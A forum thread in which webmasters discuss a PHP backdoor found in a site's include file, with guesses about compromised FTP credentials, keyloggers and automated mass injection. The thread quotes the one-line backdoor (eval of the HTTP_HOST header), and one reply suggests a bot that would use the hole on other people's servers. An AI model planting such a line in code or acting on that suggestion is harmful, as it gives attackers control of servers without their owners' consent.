|
Found this code on my site after I signed it up with CCBILL ..
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}
If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is? |
bump...
Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here.. |
In the parlance of our times... j00 g0t 0wn3d.
|
at least you got a reach around
Quote:
whats the rest of your code ? |
Quote:
|
hmm doesnt make sense to me. how does eval "make sure its good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|
|
Quote:
|
How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..
|
... lots of ways
|
If what I think is true, that will allow someone to run any php code on your site that they want.
|
seems like a conspiracy
|
Quote:
|
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.
It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with. |
Quote:
|
Quote:
|
your not the first person
|
is it in the very top or very bottom ?
|
two of my clients reported the same thing.
It seems to be part of a botnet/Ddos tool. What i read is, that code can be send to that host, and ask the host to exechute a remote script |
Quote:
when was it modified..? and try going to google and type site:yourdomain.com and see if there are any new pages indexed you dont recognize |
How the hell can that be placed in EACH ones pages?
|
Quote:
because the server was compromised |
Uh-oh, not fun for sure...
|
Quote:
|
As I said in other thread it's a way to do php code injection.
|
Quote:
|
Quote:
|
you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes
|
Quote:
|
biskoppen,
This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out. |
Quote:
My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so) ICQ : 30898463 |
biskoppen,
Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig. |
Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.
|
so... what is the status of this?
Damn CCBill doesn't have access to ICQ! Come on guys! |
Quote:
There are other sites and server compromised, Its not only "biskoppen" |
I was going to sign up for ccbill soon too.................. watching to see how this develops
and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available. this really made a lasting impression on me |
Pretty sure its not ccbill.
|
Quote:
|
that makes the most sense
|
I dont get why its not trackable throught the logfiles who did this? have you disabled logging?
|
Quote:
|
Quote:
That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had went to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like norton etc. didn't catch it. He was saying you needed something better like Kapersky. These guys got his server login info and intalled the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re upload them. Happens very fast. It could be that this is another "version" of that. |
Emagine how much traffic they can steal this way? just a few clicks from each sites can be millions in a few days
|
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work
|
Quote:
most serious people have. |
time to change your ftp password :)
|
Quote:
|
Quote:
|
Here are some potential sources of infection:
1 - your own PC could be infected, anything from a keylogger to a total owning of your PC. 2 - Someone at CCBill could also have a computer with similar ownage. 3 - Your server maybe have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar. Basically, sounds like you got owned pretty majorly. start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to looks for holes, including cron tasks, open files, extra users, odd logins, etc. Good luck. |
Quote:
FTP passwords are sent via plain/clear text. Very easy to pick them off the wire! |
Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?
|
| All times are GMT -7. The time now is 10:04 AM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2026, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123